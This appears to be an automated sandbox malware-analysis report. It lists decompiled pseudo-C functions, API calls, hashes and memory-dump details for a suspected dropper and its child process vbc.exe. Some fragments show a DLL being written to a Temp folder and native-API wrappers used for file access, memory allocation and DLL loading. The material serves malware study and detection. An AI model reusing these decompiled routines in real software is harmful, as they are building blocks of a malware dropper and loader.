                                          • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                          • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                          • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                          • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002980, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
                                          • API String ID: 2931989736-219090540
                                          • Opcode ID: 7c375f8afd58478d400fda05dde974ae29b6ec87080e81825b7103c7f3dcbe82
                                          • Instruction ID: 5824ff97a4a96918ad3fc82c54b4e1d014b6ca10106343de1590ef33332a030f
                                          • Opcode Fuzzy Hash: 7c375f8afd58478d400fda05dde974ae29b6ec87080e81825b7103c7f3dcbe82
                                          • Instruction Fuzzy Hash: 841158F9D00108BBEB10DE94DD46F9E33A8DB44344F108128F9095B246E675EA94DBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}




                                          0x00404c25
                                          0x00404c4a
                                          0x00404c6a
                                          0x00404c6d
                                          0x00404c70
                                          0x00404c87
                                          0x00404c8d
                                          0x00404c94
                                          0x00404c9b
                                          0x00404ca2
                                          0x00404ca7
                                          0x00404cad
                                          0x00000000
                                          0x00404cbd
                                          0x00404c57
                                          0x00404caa
                                          0x00404caa
                                          0x00000000
                                          0x00404caa
                                          0x00404c63
                                          0x00404c65
                                          0x00000000
                                          0x00404c65
                                          0x00404c2b
                                          0x00000000
                                          0x00000000
                                          0x00404c32
                                          0x00000000

                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404C4F
                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404CBD
                                            • Part of subcall function 00403D29: SendMessageA.USER32 ref: 00403D3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                          • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                          • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                          • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002EE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 10002F65
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          • Opcode ID: 2b638f343eddc2c01bb9a84b9d7ab39dee59757499edc11d4912f721947a8314
                                          • Instruction ID: aa153905559f738046e63650dd2ae5a0bfc77bd851c0a91f7976055672e4f384
                                          • Opcode Fuzzy Hash: 2b638f343eddc2c01bb9a84b9d7ab39dee59757499edc11d4912f721947a8314
                                          • Instruction Fuzzy Hash: C6115AB9900209AFEB04DFA4DC45FAE77B4EB88380F008468F9099B385D771EA90CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 10002C05
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          • Opcode ID: fdf6b910bd32d19119b7ec8c536a6163d6d45c1ec9364660c24e5b64fc8be5da
                                          • Instruction ID: d6b416bc803f53bb7b3f3fb92280cee38acf74576583562b657628e307c8c6e8
                                          • Opcode Fuzzy Hash: fdf6b910bd32d19119b7ec8c536a6163d6d45c1ec9364660c24e5b64fc8be5da
                                          • Instruction Fuzzy Hash: D2112AB9900208AFEB04DF64DC46FDE77A4EB89380F108468F9095B345E775EA90CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                          0x004024b0
                                          0x004024b0
                                          0x004024b3
                                          0x004024ce
                                          0x004024b5
                                          0x004024b7
                                          0x004024bc
                                          0x004024c3
                                          0x004024d5
                                          0x0040264e
                                          0x0040264e
                                          0x004024db
                                          0x004024ed
                                          0x004015a6
                                          0x004015a8
                                          0x00000000
                                          0x004015ae
                                          0x004015a8
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll,00000000,?), ref: 004024ED
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll, xrefs: 004024BC, 004024E1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWritelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll
                                          • API String ID: 427699356-4212537918
                                          • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                          • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                          • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                          • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                          0x00405466
                                          0x00405470
                                          0x00405472
                                          0x00405479
                                          0x00405481
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405481
                                          0x00405483
                                          0x00405488

                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402C77,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 0040546B
                                          • CharPrevA.USER32(80000000,00000000), ref: 00405479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\Public
                                          • API String ID: 2709904686-2272764151
                                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                          • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                          • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                          0x00405583
                                          0x00405585
                                          0x004055ad
                                          0x00405592
                                          0x00405597
                                          0x004055a2
                                          0x00000000
                                          0x004055bf
                                          0x004055ab
                                          0x004055ab
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                          • CharNextA.USER32(00000000), ref: 004055A5
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                          • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                          • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: vbc.exe PID: 1292 Parent PID: 2868 vbc.exeCOMMON

                                          Executed Functions

                                          Function 0041A40A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: 3e66b9b0f138ef3afc65d7fd6edc38906f19e169adc75cc930468f09f4a022d5
                                          • Instruction ID: 36874deaa6b3283cf0acfbc245a3942d25ef456f70dbe33b6ac0ec34a9185973
                                          • Opcode Fuzzy Hash: 3e66b9b0f138ef3afc65d7fd6edc38906f19e169adc75cc930468f09f4a022d5
                                          • Instruction Fuzzy Hash: 7DF0ECB2200108BFCB14DF99DC81EEB77B9EF8C364F158648B91DA7241D630E852CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t22;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t17 = _a12;
				_t12 =  &_a8; // 0x414d72
				_t22 =  *_t12;
				_t26 =  *_t28;
				_t18 =  *_t26(_t22, _t17, ss, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}









                                          0x0041a413
                                          0x0041a41f
                                          0x0041a427
                                          0x0041a42c
                                          0x0041a432
                                          0x0041a449
                                          0x0041a44d
                                          0x0041a44d
                                          0x0041a451
                                          0x0041a455
                                          0x0041a459

                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A45A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0041A45A(void* __eax, void* __ecx, intOrPtr* __edx) {
				void* _t2;

				_push(ss);
				_t2 =  *__edx(); // executed
				return _t2;
			}




                                          0x0041a452
                                          0x0041a455
                                          0x0041a459

                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: rMA
                                          • API String ID: 2738559852-3963102562
                                          • Opcode ID: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction ID: a17aa2240b27da952f6d4e846a73025c83d008a0d1fc895a59b0a4c2578875c1
                                          • Opcode Fuzzy Hash: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction Fuzzy Hash: 27A002BE15921478692472B53C15CFA560CC4C43B53114967F50D80410446BD8A51176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040ACF0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040ad0c
                                          0x0040ad0f
                                          0x0040ad14
                                          0x0040ad19
                                          0x0040ad23
                                          0x0040ad28
                                          0x0040ad2b
                                          0x0040ad2d
                                          0x0040ad35
                                          0x0040ad3a
                                          0x0040ad3a
                                          0x0040ad41
                                          0x0040ad49
                                          0x0040ad4c
                                          0x0040ad4e
                                          0x0040ad62
                                          0x00000000
                                          0x0040ad64
                                          0x0040ad6a
                                          0x0040ad1e
                                          0x0040ad1e
                                          0x0040ad1e

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                          0x0041a36f
                                          0x0041a377
                                          0x0041a3ad
                                          0x0041a3b1

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                          0x0041a54f
                                          0x0041a557
                                          0x0041a579
                                          0x0041a57d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                          0x0041a493
                                          0x0041a496
                                          0x0041a49f
                                          0x0041a4a7
                                          0x0041a4b5
                                          0x0041a4b9

                                          APIs
                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00750078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

